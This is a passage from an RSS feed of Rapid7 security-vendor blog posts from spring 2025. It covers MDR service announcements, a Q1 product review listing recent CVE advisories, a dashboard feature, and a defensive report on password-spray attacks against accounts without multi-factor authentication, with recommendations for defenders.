Active Remediation with Velociraptor extends that same principle to the final – and often most difficult – step: taking action on your behalf to eradicate threats.</p><h2>Delivered with Precision, Transparency, and Trust</h2><p>Active Remediation with Velociraptor is designed not just to take action, but to take the right action, the right way. Every remediation workflow is executed by Rapid7’s expert analysts using Velociraptor’s purpose-built query language (VQL) – a DFIR language engineered for precision, traceability, and scale. This allows the analyst to target specific artifacts, processes, and configurations – avoiding the blunt-force actions that often lead to full endpoint reimaging.</p><ul><li><strong>You stay in control</strong> – Remediation is performed based on clearly defined and approved scopes and parameters aligned to your security policies.</li><li><strong>You see what we do</strong> – Every action is logged, auditable, and built using readable logic within Velociraptor, with full visibility provided through detailed post-incident reports.</li><li><strong>You gain precision without disruption</strong> – Remove only what’s malicious and reverse unauthorized configurations without pulling systems offline or fully reimaging machines.</li></ul><h2>Rapid7’s New Response Workflow</h2><img src="/content/images/2025/04/Screenshot-2025-04-28-at-9.43.18-AM.png" width="auto" style="width: auto; height: auto;" /><ol><li><strong>Alert detection:</strong> Identify malicious activity across customer endpoints and network.</li><li><strong>Active Response:</strong> Quarantine affected endpoints to stem the spread of the attack.</li><li><strong>Rapid7 investigation:</strong> SOC validates threat, determines scope, and develops response plan.</li><li><strong>Active Remediation with Velociraptor:</strong> Rapid7 analysts remove malicious artifacts with precision.</li><li><strong>Mitigation guidance: </strong>Recommendations to help your team prevent threat 
reemergence.</li></ol><h2>Remediating in the Real World</h2><p>Our approach brings analyst-led, logic-driven remediation into live environments – solving the post-containment challenges security teams face every day. Unlike session-based access that relies on endpoints being on and connected to the internet, Rapid7 is delivering remediation that meets the auditability, practicality, and scalability needs of the real world:</p><ul><li><strong>Targeted threat removal without reimaging: </strong>Identify and remove only malicious artifacts – files, processes, persistence mechanisms, or unauthorized configurations – linked to a confirmed threat.</li><li><strong>Outcome: </strong>Your endpoints stay online and productive, while the threat is neutralized with minimal disruption. Avoiding unnecessary reimaging means faster recovery, reduced IT workload, and less downtime for end users.</li><li><strong>Controlled execution with transparent logic: </strong>Every remediation workflow is written in VQL – visible and reviewable by customers before deployment. There’s no scripting or ‘trust us’ execution.</li><li><strong>Outcome: </strong>Builds trust and accountability into the remediation process. You get full visibility into every action, supporting compliance requirements and reducing uncertainty in regulated environments.</li><li><strong>Distributed remediation across endpoints: </strong>When multiple endpoints are compromised by a single campaign – such as credential theft malware – we will queue high-fidelity remediation workflows across many machines simultaneously – even if some are offline.</li><li><strong>Outcome: </strong>Lays the foundation for consistent threat removal across your environment without manual intervention or system-by-system cleanup. 
This enables a timely, coordinated response that keeps pace with fast-moving attacks.</li><li><strong>Reducing friction between security and IT teams: </strong>Rather than working through lengthy remediation steps with your IT team, we execute the most critical actions directly – within approved scope – and document every step.</li><li><strong>Outcome: </strong>Fewer delays and less back-and-forth between teams. With Rapid7 handling the complete, end-to-end lifecycle of an alert, internal teams stay focused on business priorities, knowing remediation is being executed safely and effectively.</li></ul><h2>Setting the stage for remediation with Active Response</h2><p>Remediation begins with strategic containment and detailed investigation. Rapid7’s Active Response enables rules-based quarantining of affected endpoints in the immediate aftermath of a credible threat detection. This stops lateral movement before it begins and preserves the system state for investigation.</p><p>Active Remediation builds directly on this foundation. By first containing the threat, we can then investigate confidently and move quickly to identify and remove malicious artifacts – mitigating the risk of reinfection or spread. The integrated workflow – from containment to investigation to remediation – helps ensure our response is not only fast, but precise.</p><p>Together, Active Response and Active Remediation form the cornerstone of a continuous response pipeline that reduces attacker dwell time, limits impact, and restores normal operations faster.</p><h2>Unlimited incident response – now deeper than ever</h2><p>Rapid7 MDR customers have long relied on Rapid7’s unlimited DFIR support to guide them through the most critical moments of a threat. 
That hands-on expertise – delivered without surprise fees, hourly caps, or the need to navigate third-party providers and tools – is a defining part of how we ensure customers receive the fastest, most comprehensive response possible.</p><p>Active Remediation builds on that foundation by closing the final gap in the response lifecycle. Where detection, containment, and investigation have long been Rapid7’s strengths, we can now fully execute on the next step: resolving the threat. This combination of expert-led triage with decisive, hands-on remediation delivers a more unified, end-to-end response – minimizing delays, reducing reliance on your internal resources, and accelerating your path to recovery. It’s not just about reacting faster – it’s about responding smarter, start to finish.</p><h2>More than a capability – it’s a commitment</h2><p>The <a href="/services/managed-detection-and-response-mdr/">Rapid7 MDR service</a> has always been built around standing shoulder to shoulder with our customers, especially when it matters most. As we expand this partnership through the finale of the detection and response lifecycle – taking action to remove threats, reduce disruption, and accelerate recovery – we do it with the same transparency, accountability, and respect for your control that defines every part of the Rapid7 experience. In the name of building true security resilience, partnership doesn’t end with guidance – it means staying with you all the way through to resolution. Active Remediation with Velociraptor is in closed early access and will roll out to MDR customers in mid-May. To learn more, please contact your account team or Cybersecurity Advisor.</p><p><em>1 </em><a href="https://gbhackers.com/ransomware-gangs-encrypt-systems/"><em>gbhackers</em></a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/29/deepening-the-mdr-partnership-rapid7-now-delivers-active-remediation-with-velociraptor</link>
      <guid isPermaLink="false">blt270538a69579c2ca</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Velociraptor]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
      <pubDate>Tue, 29 Apr 2025 12:35:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb2ca1bfd93386107/683de131543b8d5a7bbf11d4/gettyimages-2209566971.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[THE NEW Rapid7 MDR for Enterprise: Tailored Detection and Response for Complex Environments]]></title>
      <description><![CDATA[<p>Complex ecosystems. Custom applications. Specialized log sources. Distributed operations. Enterprise security leaders aren’t just defending against threats—they’re navigating a fragmented environment where visibility, coverage, and coordination are constant challenges.</p><p>Our MDR service provides powerful protection for thousands of organizations worldwide today. But as enterprise environments grow more distributed and unique, many security teams find themselves needing something more flexible—something that can be tightly aligned to their internal workflows, toolsets, and detection strategies.</p><p>That’s why we’re excited to introduce <a href="/services/managed-detection-and-response-mdr/enterprise/">Rapid7 MDR for Enterprise</a>—a fully managed, customized detection and response service designed to meet the complexity of the modern enterprise head-on.</p><h2>Tailored Coverage to Extend Your Existing Security Program</h2><p>MDR for Enterprise builds on the proven foundation of Rapid7’s MDR, layering on advanced customization and collaboration to meet highly specific enterprise needs:</p><ul><li><strong>Custom Event Source Integration:</strong> Extend visibility to proprietary, vertical-specific, or legacy technologies that standard integrations don’t cover.</li><li><strong>Bring Your Own Logs</strong>: Monitor your own log sources, working with our Detection Engineering team to optimize signal fidelity and context.</li><li><strong>Tailored Detection Engineering:</strong> Rapid7 Detection Engineers design and tune detection rules that reflect your actual environment—not a theoretical model​.</li></ul><h3>Designed to Meet You Where You Are</h3><p>Enterprise environments rarely look the same. Some rely on legacy infrastructure alongside modern cloud stacks. Others have industry-specific applications or internally developed tools that aren’t covered by typical MDR integrations. 
And many are already investing in their own detections or bringing in telemetry from a wide range of tools.</p><p>MDR for Enterprise is built to adapt to this complexity. It allows customers to bring their own log sources and extend monitoring into non-standard systems. Whether it's a homegrown application or a niche vertical-specific tool, we’ll build the integration and align detection logic to your context—not the other way around.</p><h3>More Than a Vendor. A True Operational Partner.</h3><p>One of the biggest differences with MDR for Enterprise is how we collaborate. This isn’t a black-box service or a reactive alert-forwarding engine. We work alongside your internal team to co-develop incident response protocols and continuous tuning cycles.</p><p>We’re not just another SOC you plug into—we’re a strategic extension of your security program. Through tightly integrated processes and regular reviews, your team and ours operate as one. That operational interlock ensures context is never lost, alerts are always actionable, and response is always aligned to your priorities.</p><h3>Elevating the Tools You Already Trust</h3><p>Enterprise security teams have made serious investments—in technology, in detection engineering, in internal processes. We’re not here to disrupt that. MDR for Enterprise is designed to enhance your existing ecosystem, not replace it.</p><p>We will partner with you to develop a custom monitoring solution for your business-critical applications to meet your specific security use cases—from triage to investigation and response through our global SOC. This approach improves your ROI and creates a seamless bridge between your team’s internal expertise and our operational scale.</p><h2>Enterprise-Ready, Without the Tradeoffs</h2><p>With MDR for Enterprise, you don’t have to choose between visibility and control, speed and customization, or scale and support. 
You get a partner that understands enterprise complexity—and builds a service around it.</p><p>Ready to explore what tailored MDR could look like for your team? Reach out to the team or head to <a href="/services/managed-detection-and-response-mdr/enterprise/">Rapid7 MDR for Enterprise</a> to learn more.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/24/the-new-rapid7-mdr-for-enterprise-tailored-detection-and-response-for-complex-environments</link>
      <guid isPermaLink="false">blte030f65a75922fe5</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[C.J. Spallitta]]></dc:creator>
      <pubDate>Thu, 24 Apr 2025 13:45:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b140436b26d15ee/683ddebc590d7f636ede1b00/gettyimages-2193672854.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Password Spray Attacks Taking Advantage of Lax MFA]]></title>
      <description><![CDATA[<p>In the first quarter of 2025, Rapid7’s Managed Threat Hunting team observed a significant volume of brute-force password attempts leveraging FastHTTP, a high-performance HTTP server and client library for Go, to automate unauthorized logins via HTTP requests.</p><p>This rapid volume of credential spraying was primarily designed to discover and compromise accounts not properly secured by multi-factor authentication (MFA). Out of just over a million unauthorized login attempts we observed, the distribution of originating traffic sources is similar to that <a href="https://www.bleepingcomputer.com/news/security/hackers-use-fasthttp-in-new-high-speed-microsoft-365-password-attacks/">previously seen</a> in January 2025. Some of the most prominent nations serving as points of origin for these attempts are as follows:</p><ul><li><strong>Brazil</strong>: 70%</li><li><strong>Venezuela</strong>: 3%</li><li><strong>Turkey</strong>: 3%</li><li><strong>Russia</strong>: 2%</li><li><strong>Argentina</strong>: 2%</li><li><strong>Mexico</strong>: 2%</li></ul><p>Analysis of attempted initial access via compromised or absent MFA revealed a significant success rate for defenders’ security controls. Overwhelmingly, 73% of attempts resulted in account lockouts, with an additional 26% failing due to incorrect passwords. Account disabling accounted for 1% of failures. Critically, fewer than 1% of accounts were successfully compromised through brute-force attacks, highlighting the robust effectiveness of implemented credential brute-forcing prevention measures.</p><p>There is a heavy emphasis here on rapid-fire, repeated attempts to log in resulting in accounts eventually being locked. 
The small number of accounts being disabled could be an additional security step after too many attempts to log in, or simply that the person associated with the account has left the organization.<br/><br/>The misuse of FastHTTP to automate unauthorized logins at speed is just one aspect of a much broader problem: namely, the popularity of initial access to networks aided by a persistent lack of MFA for VPN, SaaS, and VDI products. Rapid7 expects to see this type of rapid-fire, brute force attack become more common as cloud authentication becomes more prevalent. It’s entirely possible threat actors will look to try similar account compromising attempts with other tools and libraries, and commonly abused user agent strings.</p><h2>Incident Response Facts and Figures: Handing Attackers an Easy Victory</h2><p>Rapid7 has consistently highlighted MFA as a primary concern across several threat research reports. By the <a href="/blog/post/2023/08/17/rapid7s-mid-year-threat-review/">midpoint of 2023</a>, data for the first half of the year showed that 39% of incidents our managed services teams responded to had arisen from lax or lacking MFA. Our <a href="/blog/post/2024/12/16/2024-threat-landscape-statistics-ransomware-activity-vulnerability-exploits-and-attack-trends">2024 Threat Landscape</a> blog highlighted that remote access to systems without MFA was responsible for 56% of incidents as an initial access vector, the largest driver of incidents overall.<br/><br/>The third quarter of 2024 saw 67% of incident responses involving abuse of valid accounts and missing or lax enforcement of MFA. This total sits at 57% for Q4 2024, in part because of a 22% increase in social engineering. Even without pausing to consider user agent-centric password spraying, this is a potentially dangerous combination for organizations not making the most of MFA-centric protection. 
If the brute forcing doesn’t get you, a <a href="/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/">social engineering campaign might just do the trick</a>.</p><h2>Why MFA Matters: The Consequences of “We’ll Set It up Later”</h2><p>MFA is a key component of an overall <a href="/fundamentals/iam-identity-and-access-management/">Identity Access Management (IAM)</a> strategy. If you’re not making use of it, then your overall defense is weakened against many of the most common threats out there, including:</p><ul><li><a href="/fundamentals/phishing-attacks/"><strong>Phishing</strong></a>: The very best password you can muster is made entirely redundant if your employee hands it over to a phisher, whether via a forged website or a social engineering attack. One way to mitigate against this is to use a password manager, which will only automatically enter your details on a valid website. But what happens if your password manager’s master password is compromised, and all the logins contained within are exposed? One of the best ways to address this additional headache is MFA for all your accounts, including your password manager.<br/></li><li><a href="/fundamentals/malware-attacks/"><strong>Malware</strong></a>: Do you know what malware, password stealers, and keyloggers love more than anything else? Grabbing all of those passwords stored in web browsers, or (in more serious cases) plain text files on the desktop and email drafts. Do you know what they don’t like? Having all of those perilous passwords protected with an additional layer of security. MFA could make the difference between compromise and data exfiltration versus a last-minute save and a security training refresher.<br/></li><li><strong>Credential stuffing</strong>: An unfortunate by-product of years of data breaches (often with phishing as the launchpad), roll-ups of new and ancient login details published online are a constant threat. 
It’s worth noting that it isn't just your current employees who could be on these lists—ex-employees with valid credentials are a cause for concern too.</li></ul><h2>Recommendations from Rapid7’s MDR and IR Experts</h2><p>Here are some steps you can take now to improve your security posture and mitigate risk from attacks like these, courtesy of Rapid7’s MDR and IR experts:</p><ul><li>Implement multi-factor authentication (MFA) across all account types, including default, local, domain, and cloud accounts, to prevent unauthorized access, even if credentials are compromised.<br/></li><li>Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.<br/></li><li>Ensure that applications do not store sensitive data or credentials insecurely (e.g., plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).<br/></li><li>Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. These audits should also check whether default accounts have been enabled, or whether new local accounts have been created that have not been authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.<br/></li><li>Regularly audit user accounts for activity and deactivate or remove any that are no longer needed.<br/></li><li>Whenever possible and aligned with business requirements, disable legacy authentication for non-service accounts and users relying on it. 
Legacy authentication, which does not support MFA, should be <a href="https://learn.microsoft.com/en-us/entra/identity/conditional-access/block-legacy-authentication">replaced with modern authentication protocols</a>.<br/></li><li>Applications may send push notifications to verify a login as a form of multi-factor authentication (MFA). Train users to only accept valid push notifications and to report suspicious push notifications.</li></ul><h2>You can’t go wrong with MFA</h2><p>Imagine a scenario where your network is under fire from a worryingly high number of brute force attempts from across the globe, targeting your insecure accounts until just one is compromised. Now imagine that same scenario where everything is blocked by default, regional restrictions are applied, logins from user agents aren’t allowed, and all of your VPNs, your RDP, VDIs, and SaaS tools are secured with MFA.</p><p>This may feel like an overreaction to what you may view as an attack that looks like an edge case; however, consider that ransomware groups, alongside more commonly found malware authors and phishers, will <em>also</em> find you a significantly harder target to break as a result of these countermeasures being put in place. Please don’t end up in the inevitable percentage of organizations compromised due to missing MFA in our next threat research report; there’s no better time than now to think about building out a stronger security posture.<br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/10/password-spray-attacks-taking-advantage-of-lax-mfa</link>
      <guid isPermaLink="false">bltd647c69cac7f7281</guid>
      <category><![CDATA[Detection and Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Chris Boyd]]></dc:creator>
      <pubDate>Thu, 10 Apr 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5d4660074ed5c0dc/683de4b2abf2ad6b273c4517/gettyimages-2084264422.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[What’s New in Rapid7 Products & Services: Q1 2025 in Review]]></title>
      <description><![CDATA[<p>At Rapid7, we started off the year focused on delivering new features and advancements across our products and services to bring you the context needed to prioritize exposures, visualize your attack surface, and accelerate incident response. Read on for Q1 2025 release highlights across the Command Platform, from <a href="/products/command/exposure-management/">Exposure Command</a> to <a href="/services/managed-detection-and-response-mdr/">Managed Threat Complete</a>.</p><h2>Eliminate blind spots with Exposure Management</h2><h3>Discover and protect sensitive data across hybrid environments</h3><p>Keeping sensitive data secure across hybrid and multi-cloud environments isn’t easy—especially without clear visibility. Data gets misplaced, duplicated, or left exposed, making risk assessment and compliance difficult. <a href="/blog/post/2025/02/25/uncovering-and-protecting-sensitive-data-across-cloud-environments-with-exposure-command/">Sensitive Data Discovery</a>, our latest feature delivering clarity and control to your security data, can help.</p><p>Available as part of Exposure Command and <a href="/products/insightcloudsec/">InsightCloudSec</a>, Sensitive Data Discovery gives security teams real-time visibility into sensitive data, such as PII, financial data or customer records, across multi-cloud environments, helping identify exposures, prioritize risks, and take action faster.</p><p>With automated scanning and classification, you can pinpoint who has access to sensitive data, continuously monitor for exposures, and strengthen compliance while streamlining incident response. 
Learn more about Sensitive Data Discovery <a href="/blog/post/2025/02/25/uncovering-and-protecting-sensitive-data-across-cloud-environments-with-exposure-command/">here</a>.</p><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.41.33-AM.png" caption="Sensitive Data Discovery in InsightCloudSec" width="auto" style="width: auto; height: auto;" /><figcaption>Sensitive Data Discovery in InsightCloudSec</figcaption></figure><h3>Intelligent vulnerability prioritization with AI-driven CVSS Scoring</h3><p>In February 2024, the National Vulnerability Database (NVD) stopped providing CVSS scores for all CVEs, creating a gap in risk assessment as vulnerabilities go unscored. To bridge this gap, we’ve introduced AI-Generated Risk Scoring in Exposure Command, which uses machine learning to supplement missing CVSS scores and ensure an immediate, accurate risk rating for all <a href="/fundamentals/common-vulnerabilities-and-exposures-cve/">CVEs</a> without manual analysis.</p><p>This AI/ML scoring ensures all vulnerabilities are properly assessed, helping you prioritize remediation efforts efficiently and strengthen your overall security posture with the right context and insights. Discover more about AI-driven CVSS Scoring <a href="/blog/post/2025/02/19/rapid7-fills-gaps-in-the-cve-assessment-process-with-ai-generated-vulnerability-scoring-in-exposure-command/">here</a>.</p><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.42.40-AM.png" caption="CVSS Risk Scoring in InsightVM" width="auto" style="width: auto; height: auto;" /><figcaption>CVSS Risk Scoring in InsightVM</figcaption></figure><h3>Prioritize risk and accelerate remediation of critical exposures</h3><p>To effectively prioritize remediation efforts and reduce cyber risk, you need clear contextual information about your assets and vulnerabilities. 
Without this, you risk misclassifying the severity of vulnerabilities and wasting effort on low-priority issues while high-risk threats remain unaddressed.</p><p>Our newly expanded <a href="/products/command/attack-surface-management-asm/">Surface Command</a> and Remediation Hub integration embeds this necessary context about assets and vulnerabilities directly within the asset inventory and detail pages of Surface Command, providing:</p><ul><li>Faster mean-time-to-remediate (MTTR) by bringing prioritized remediation guidance directly to the pages your team is already working within in Surface Command.</li><li>Deeper asset context at the time of remediation, including insights from third-party security and ITOps tooling.</li><li>Improved collaboration by providing security teams and stakeholders with enriched context for quicker decision-making.</li></ul><p>Learn more about how this integration can empower your team to act with confidence, ensuring that remediation efforts are focused on the vulnerabilities that matter most <a href="https://docs.rapid7.com/insightvm/remediation-hub/">here</a>.</p><h2>MDR: A clear line of sight</h2><h3>New detection and response dashboard</h3><p>Teams need a holistic view of threats, SOC activity, and response performance to have confidence in their program and communicate efficacy to leadership and stakeholders. 
Available for Managed Detection and Response customers, our new customizable Detection & Response Dashboard provides an executive-ready snapshot of your MDR program, offering real-time, easy-to-communicate insights into:</p><ul><li><strong>Threat prioritization & alert trends</strong>: Analyze the volume of alerts by severity and identify the most common alert types to understand the highest-risk threats.</li><li><strong>Incident response efficiency</strong>: Threat pipeline visualization tracks how alerts progress to investigations and incidents, while mean time to begin investigating highlights response speed.</li><li><strong>Investigation & resolution metrics</strong>: Insights into closed alerts and investigations by priority and disposition help teams assess the effectiveness of their threat response and remediation efforts.</li></ul><figure><img src="/content/images/2025/03/Screenshot-2025-03-31-at-9.44.18-AM.png" caption="Detection and Response Dashboard in Rapid7 MDR" width="auto" style="width: auto; height: auto;" /><figcaption>Detection and Response Dashboard in Rapid7 MDR</figcaption></figure><p>Learn more about the dashboard in <a href="/blog/post/2025/03/31/seeing-is-securing-mdr-value-at-a-glance-with-the-detection-response-dashboard/">our blog</a>.</p><h3>Transparency in AI-driven security: AI Alert Triage decisioning</h3><p>Artificial intelligence (AI) has transformed security operations, enabling faster detection and response. However, black-box AI decision-making can lead to uncertainty—why was an alert escalated or dismissed?</p><p>With Rapid7’s AI Alert Triage Transparency, MDR customers gain full visibility into the reasoning behind AI-driven security actions, such as what factors influenced alert prioritization. You’ll also benefit from Rapid7’s AI triage’s 99.89% accuracy, reducing noise and giving you more time to focus on investigating real threats. 
Learn more about what this means for your organization <a href="/blog/post/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/">here</a>.</p><figure><img src="/content/images/2025/04/image--7-.png" caption="AI-Powered Auto Triage in Rapid7 MDR" width="auto" style="width: auto; height: auto;" /><figcaption>AI-Powered Auto Triage in Rapid7 MDR</figcaption></figure><h2>The latest intelligence from Rapid7 Labs</h2><h3>Emergent threat response: Real-time guidance for critical threats</h3><p>Rapid7’s Emergent Threat Response (ETR) program from <a href="/research/">Rapid7 Labs</a> delivers fast, expert analysis and first-rate security content for the highest-priority security threats to help both Rapid7 customers and the greater security community understand their exposure and act quickly to defend their networks against rising threats. </p><p>In Q1 2025, Rapid7’s ETR team provided expert analysis, InsightVM content, and mitigation guidance for a variety of notable vulnerabilities, including several that came under active attack. 
Q1 CVEs of note include:</p><ul><li><a href="/blog/post/2025/03/25/etr-multiple-vulnerabilities-in-ingress-nginx-controller-for-kubernetes/">CVE-2025-1974, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, CVE-2025-24513</a>: Multiple vulnerabilities in Ingress NGINX Controller for Kubernetes</li><li><a href="/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/">CVE-2025-29927</a>: Notable vulnerabilities in Next.js (CVE-2025-29927) and CrushFTP</li><li><a href="/blog/post/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/">CVE-2025-23120</a>: Critical Veeam Backup & Replication RCE</li><li><a href="/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/">CVE-2025-24813</a>: Apache Tomcat RCE (low exploitability)</li><li><a href="/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/">CVE-2025-22224, CVE-2025-22225, CVE-2025-22226</a>: Multiple zero-day vulnerabilities in Broadcom VMware ESXi and other products</li><li><a href="/blog/post/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak/">CVE-2024-55591</a>: Zero-day exploitation of Fortinet FortiOS</li><li><a href="/blog/post/2025/01/08/etr-cve-2025-0282-ivanti-connect-secure-zero-day-exploited-in-the-wild/">CVE-2025-0282</a>: Zero-day exploitation of Ivanti Connect Secure</li></ul><p>Follow along <a href="/blog/series/emergent-threats/emergent-threats/">here</a> to see the latest emergent threat guidance from our team.</p><h3>Technical assessments of CVEs in AttackerKB</h3><p>This past quarter Rapid7 researchers also published additional vulnerability assessments in <a href="https://attackerkb.com/">AttackerKB</a> (Rapid7’s community platform for vulnerability research and threat data) to help customers and the community understand and prioritize notable CVEs:</p><ul><li><a href="https://attackerkb.com/topics/UM2s9nB7k4/cve-2024-12084/rapid7-analysis">CVE-2024-12084</a>: 
Heap-based buffer overflow in Rsync</li><li><a href="https://attackerkb.com/assessments/951efdb5-288e-4608-8bde-667656782321">CVE-2025-0108</a>: Path confusion vulnerability in Palo Alto Networks PAN-OS web service</li><li><a href="https://attackerkb.com/assessments/1711e1d9-4407-4c28-ae4e-379952e65026">CVE-2024-57727</a>: Unauthenticated path traversal in SimpleHelp RMM</li></ul><h3>Coordinated vulnerability disclosure</h3><p>In February 2025, Rapid7 researchers discovered a novel vulnerability in PostgreSQL (now assigned CVE-2025-1094) while researching BeyondTrust CVE-2024-12356, which was exploited as a zero-day flaw in a high-profile attack on the U.S. Treasury Department. </p><p>In every scenario Rapid7 researchers tested, a successful exploit for BeyondTrust CVE-2024-12356 had to include exploitation of PostgreSQL CVE-2025-1094 in order to achieve remote code execution. See Rapid7’s full analysis of CVE-2024-12356 <a href="https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis">here</a> and our disclosure of PostgreSQL CVE-2025-1094 <a href="/blog/post/2025/02/13/cve-2025-1094-postgresql-psql-sql-injection-fixed/">here</a>.</p><h2>Stay tuned for more!</h2><p>As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and <a href="https://docs.rapid7.com/release-notes/">release notes</a> as we continue to highlight the latest in product and service investments at Rapid7.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/01/whats-new-in-rapid7-products-services-q1-2025-in-review</link>
      <guid isPermaLink="false">blte5214fd945e12240</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Margaret Wei]]></dc:creator>
      <pubDate>Tue, 01 Apr 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt895aa4b6ddc34ea9/683de3da3e68ee6b3c889aa2/gettyimages-2012415789.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Seeing is Securing: MDR VALUE at-a-glance with the Detection and Response Dashboard]]></title>
      <description><![CDATA[<p>Transparency is core to <a href="/services/managed-detection-and-response-mdr/">Managed Detection & Response (MDR)</a>. It’s necessary between Rapid7 and our customers as we conduct security operations on their behalf. And it’s necessary for our customers to communicate transparently and effectively with their stakeholders.</p><p>Scroll on – because there’s a new executive-level MDR performance dashboard that delivers it.</p><h2>Just the right amount of information</h2><p>Every day, our four global SOCs analyze and triage thousands of alerts – investigating incidents, informing remediation actions, and quarantining breached endpoints. This activity is then translated into strategic guidance by dedicated Cybersecurity Advisors, ensuring security leaders have the insights they need to stay ahead of threats.</p><p>To deliver on that commitment to transparency, we ensure that all of this activity takes place in <a href="/products/insightidr/">InsightIDR</a>, our next-gen SIEM and XDR platform that gives MDR customers a direct line of sight into security activity, logs, detections, and their security posture. 
You see what the SOC sees – every detection, alert, investigation, and response action across your environment.</p><p>To keep pace with the speed of modern adversaries and realize the value of their MDR program, security teams need a high-level, executive-ready snapshot that showcases program effectiveness, surfaces key trends, and enables informed decision-making.</p><h2>Enter the Detection and Response Dashboard</h2><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdRDRMv3tVjRgB4CMkw17SMd3a5bddvovkKMb1kSTECFHfjrXhqTcCIeCIzMI7ErxHGC8LNZPyRn7agMgHzu2lDm56QM7rJVL0insj3K6bbJZKRU5-re6MX8Z-m0RioOfcaxKXF0g?key=QG7TNlVYDieuDg5clkFsQkzP" width="auto" style="width: auto; height: auto;" /><h3>A holistic view of your MDR program</h3><p>The <strong>Detection and Response Dashboard</strong> provides a clear, high-level snapshot of your entire MDR program. The customizable and downloadable summary visualizes key metrics, helping teams quickly identify risks, trends, and security outcomes.</p><h3>Clarity on How the SOC is Working for You</h3><p>Designed to give security teams an at-a-glance understanding of how their MDR program is performing – breaking down everything from SOC activity and detection trends to response times and containment actions – the Dashboard distills the thousands of alerts and SOC activity that I mentioned earlier.</p><p>By offering a transparent lens into the day-to-day operations of Rapid7’s global SOCs, the Dashboard gives customers confidence in the behind-the-scenes work driving their MDR program. Instead of wondering whether threats are being seen or how decisions are made, customers can see the operational heartbeat of their service: what’s being triaged, when the SOC steps in, and how investigations unfold over time. This level of visibility helps customers trace the lifecycle of real threats through the eyes of the SOC — from detection to action — while also revealing patterns in analyst activity, responsiveness, and escalation. 
It bridges the gap between outsourced operations and internal accountability, allowing security teams to not only report on what’s being done, but understand how it’s being done and why.</p><h3>Visualize and Understand Threat Trends Over Time</h3><p>Threats don’t just appear and disappear – they evolve, shifting tactics and targeting different areas of your environment. The Detection and Response Dashboard surfaces key trends in the alerts and investigations processed by the SOC, mapping out attacker behaviors and identifying the most frequently targeted assets. By tracking how threats develop and where adversaries are focusing their efforts, security teams can better anticipate emerging risks and validate the impact of their security investments.</p><p>Security teams can view and download summary information including:</p><ul><li><strong>Threat Prioritization & Alert Trends</strong>: Analyze the volume of alerts by severity and identify the most common alert types to understand the highest-risk threats.</li><li><strong>Incident Response Efficiency</strong>: Threat pipeline visualization tracks how alerts progress to investigations and incidents, while mean time to begin investigating highlights response speed.</li><li><strong>Investigation & Resolution Metrics</strong>: Insights into closed alerts and investigations by priority and disposition help teams assess the effectiveness of their threat response and remediation efforts.</li></ul><p>For highly mature security teams, this level of insight offers a data-driven foundation for evolving defenses and prioritizing resources based on real-world threat activity. 
At the same time, the Dashboard remains accessible for teams earlier in their security journey, providing a clear, digestible view of security trends without overwhelming technical detail.</p><h3>Demonstrate Your Security Program’s Value Internally</h3><p>Proving the impact of a security program isn’t just about responding to threats – it’s about showcasing measurable progress. The Detection and Response Dashboard translates raw security data into compelling, digestible visuals, making it easier to communicate security performance to stakeholders at all levels.</p><p>By presenting security outcomes in a way that resonates across both technical and executive audiences, the Dashboard enables teams to align more effectively with IT and business leaders. This ensures that security investments and priorities are grounded in real data, not assumptions. And as MDR customers expand their security programs, integration with Asset Discovery allows teams to identify hidden assets and weave risk-aware insights directly into their broader security strategy.</p><h2>The Next Step of ‘Seeing is Securing’ is Here</h2><p>It’s now easier than ever to understand, track, and communicate the full scope and value of your security operations through your partnership with the Rapid7 SOC. If you’re not yet leveraging our MDR, you’re missing out on the most comprehensive approach to 24/7 SOC expertise, risk-aware threat detection, and unlimited incident response. Learn more about how Rapid7 MDR can strengthen your security program – <a href="/services/managed-detection-and-response-mdr/">get the details here</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/03/31/seeing-is-securing-mdr-value-at-a-glance-with-the-detection-response-dashboard</link>
      <guid isPermaLink="false">blt2229910294977fb7</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Security Operations (SOC)]]></category><dc:creator><![CDATA[Conner Goldstein]]></dc:creator>
